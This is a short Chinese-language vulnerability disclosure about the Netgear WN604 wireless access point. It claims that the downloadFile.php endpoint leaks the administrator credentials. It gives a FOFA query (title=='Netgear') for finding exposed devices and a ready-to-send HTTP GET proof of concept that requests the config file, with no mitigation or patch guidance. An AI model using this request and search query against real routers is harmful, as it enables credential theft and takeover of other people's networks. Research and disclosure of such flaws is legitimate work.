0x01 产品简介

NETGEAR WN604是一款由NETGEAR（网件）公司生产的无线接入器（或无线路由器）提供Wi-Fi保护协议（WPA2-PSK, WPA-PSK），以及有线等效加密（WEP）64位、128位和152位支持，保障网络安全。同时支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制，进一步增强网络安全性。

0x02 漏洞概述

Netgear WN604 downloadFile.php接口处存在信息泄露漏洞，文件身份验证的远程攻击者可以利用此漏洞获取无线路由器的管理员账号密码信息，导致路由器后台被控，攻击者可对无线网络发起破坏或进一步威胁。

0x03 影响范围

WN604 <= 20240710版本

0x04 复现环境

FOFA：title=="Netgear"

0x05 漏洞复现

PoC

GET /downloadFile.php?file=config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close